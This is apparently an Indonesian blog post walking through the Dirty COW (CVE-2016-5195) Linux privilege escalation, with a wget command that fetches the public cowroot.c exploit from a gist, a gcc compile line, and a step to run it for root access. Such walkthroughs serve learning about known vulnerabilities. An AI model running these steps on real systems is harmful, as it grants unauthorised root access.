Sunday, October 30, 2016

[Linux,Security] Dirty Cow - CVE-2016-5195 "Race Condition Privilege Escalation (SUID)"


Melanjutkan postingan sebelum nya yaitu Dirty Cow - CVE-2016-5195 "Race Condition Privilege Escalation (Write Access)" , selanjutnya mengenai akses user biasa, bisa masuk ke akses root dengan file cowroot.c yang sudah tersedia di website dirtycow.ninja.
Proof of Concepts (PoC)
untuk percobaan sistem operasi yang digunakan berbeda dengan postingan sebelumnya, pada percobaan ini sistem operasi yang digunakan yaitu 


download file cowroot.c 
$wget https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c

Kemudian lakukan compile program file tersebut.
$ gcc cowroot.c -o cowroot -pthread
Note: beberapa distro linux mengalami permasalahan saat melakukan compile

Namun jika berhasil langsung jalankan program cowroot


Dirty COW logo
Referensi :




No comments:

Post a Comment